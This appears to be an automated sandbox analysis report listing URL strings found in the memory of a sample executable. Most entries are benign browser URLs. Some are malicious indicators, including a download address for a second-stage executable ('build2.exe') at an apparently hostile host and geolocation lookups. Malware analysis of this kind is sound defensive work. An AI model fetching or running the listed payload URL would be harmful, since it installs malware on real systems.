Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yF6n?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yxVU?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBi9v6?m=6&o=true&u=true&n=true&w=30&h=30
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnYSFZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: U59WtZz2Sg.exe, 00000005.00000003.497150466.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
Source: U59WtZz2Sg.exe, 00000005.00000003.507888546.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.501922929.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/f60532dd-3aac3bb8/directi
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.444451772.0000000003060000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=166&w=31
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBi9v6.img?m=6&o=true&u
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
Source: U59WtZz2Sg.exe, 00000005.00000003.385404722.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.574964169.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.385286762.000000000086A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://uaery.top/dl/build2.exe
Source: U59WtZz2Sg.exe, 00000005.00000002.574964169.00000000008AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://uaery.top/dl/build2.exe$run
Source: U59WtZz2Sg.exe, 00000005.00000003.385404722.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.574964169.00000000008AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://uaery.top/dl/build2.exeJ_
Source: U59WtZz2Sg.exe, 00000005.00000003.385286762.000000000086A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://uaery.top/dl/build2.exerunk6
Source: U59WtZz2Sg.exe, 00000005.00000003.349908003.0000000003060000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.amazon.com/
Source: U59WtZz2Sg.exe, 00000005.00000003.545871666.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.ecma-international.org/ecma-262/5.1/#sec-C
Source: U59WtZz2Sg.exe, 00000005.00000003.408637409.0000000003060000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.freetype.org
Source: U59WtZz2Sg.exe, 00000005.00000003.530047759.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528005153.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527905885.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527699347.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529404894.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528855392.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528097089.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528636685.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529863093.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529604993.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528540404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527571080.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528204840.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.gnu.org/licenses/gpl-2.0.html.
Source: U59WtZz2Sg.exe, 00000005.00000003.350519152.0000000003060000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.google.com/
Source: U59WtZz2Sg.exe, 00000005.00000003.507888546.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.501922929.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.inkscape.org/)
Source: U59WtZz2Sg.exe, 00000005.00000003.507888546.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.501922929.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.inkscape.org/namespaces/inkscape
Source: U59WtZz2Sg.exe, 00000005.00000003.350689497.0000000003060000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.live.com/
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: U59WtZz2Sg.exe, 00000005.00000003.497150466.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: U59WtZz2Sg.exe, 00000005.00000003.350793064.0000000003060000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.nytimes.com/
Source: U59WtZz2Sg.exe, 00000005.00000003.408637409.0000000003060000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.openssl.org/)
Source: U59WtZz2Sg.exe, 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://www.openssl.org/support/faq.html
Source: U59WtZz2Sg.exe, 00000005.00000003.530047759.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528005153.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527905885.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527699347.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529404894.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528855392.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528097089.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528636685.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529863093.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529604993.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528540404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527571080.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528204840.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.qt.io/contact-us.
Source: U59WtZz2Sg.exe, 00000005.00000003.530047759.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528005153.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527905885.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527699347.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529404894.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528855392.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528097089.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528636685.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529863093.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529604993.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528540404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527571080.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528204840.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.qt.io/licensing/
Source: U59WtZz2Sg.exe, 00000005.00000003.530047759.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528005153.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527905885.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527699347.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529404894.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528855392.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528097089.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528636685.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529863093.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529604993.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528540404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527571080.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528204840.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.qt.io/terms-conditions.
Source: U59WtZz2Sg.exe, 00000005.00000003.350865270.0000000003060000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.reddit.com/
Source: U59WtZz2Sg.exe, 00000005.00000003.350997403.0000000003060000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.twitter.com/
Source: U59WtZz2Sg.exe, 00000005.00000003.351096585.0000000003060000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.wikipedia.com/
Source: U59WtZz2Sg.exe, 00000005.00000003.351612553.0000000003060000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.youtube.com/
Source: U59WtZz2Sg.exe, 00000005.00000003.496991699.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4842492154761;g
Source: U59WtZz2Sg.exe, 00000005.00000003.496991699.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=58648497779
Source: U59WtZz2Sg.exe, 00000005.00000003.496991699.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=3931852
Source: U59WtZz2Sg.exe, 00000005.00000003.362264776.0000000003060000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com
Source: U59WtZz2Sg.exe, 00000005.00000003.496991699.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gt
Source: U59WtZz2Sg.exe, 00000005.00000003.496991699.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gtm=
Source: U59WtZz2Sg.exe, 00000005.00000003.469204147.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.449920000.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.450333989.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.468930777.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.447608292.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.446128369.0000000003060000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.471179889.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.470164900.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.459195110.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.458107166.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.471657839.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.469951048.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.446549026.0000000003060000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.454318911.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.462575287.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.445860097.0000000003060000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.470405278.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.461142803.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.467350799.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.454777697.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.460776709.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/AA23z1a
Source: U59WtZz2Sg.exe, 00000005.00000003.457247775.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/Vh5j3k
Source: U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.385286762.000000000086A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/
Source: U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/B
Source: U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000003.308040774.000000000089A000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000003.308057042.000000000089F000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000003.00000002.318481347.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000004.00000002.362805036.0000000002280000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.json
Source: U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.json5
Source: U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.json=
Source: U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.json=P
Source: U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.jsongP
Source: U59WtZz2Sg.exe, 00000001.00000003.306241286.000000000089F000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000003.308057042.000000000089F000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000003.306100466.000000000089F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.jsonk
Source: U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.jsonl
Source: U59WtZz2Sg.exe, 00000005.00000003.545471776.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.546543404.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: U59WtZz2Sg.exe, 00000005.00000003.497150466.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: U59WtZz2Sg.exe, 00000005.00000003.497150466.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: U59WtZz2Sg.exe, 00000005.00000003.497150466.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: U59WtZz2Sg.exe, 00000005.00000003.420123871.0000000003060000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BE6B7572D
Source: U59WtZz2Sg.exe, 00000005.00000003.545471776.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/:
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/B
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/:
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/B
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/:
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/B
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: U59WtZz2Sg.exe, 00000005.00000003.545471776.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/:
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/?lfhs=2
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/B
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: U59WtZz2Sg.exe, 00000005.00000003.545871666.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
Source: U59WtZz2Sg.exe, 00000005.00000003.496991699.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/:
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/B
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: U59WtZz2Sg.exe, 00000005.00000003.462575287.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.445860097.0000000003060000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.461142803.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.460215496.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.450591507.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.458323064.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/about/en-us/0
Source: U59WtZz2Sg.exe, 00000005.00000003.546543404.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
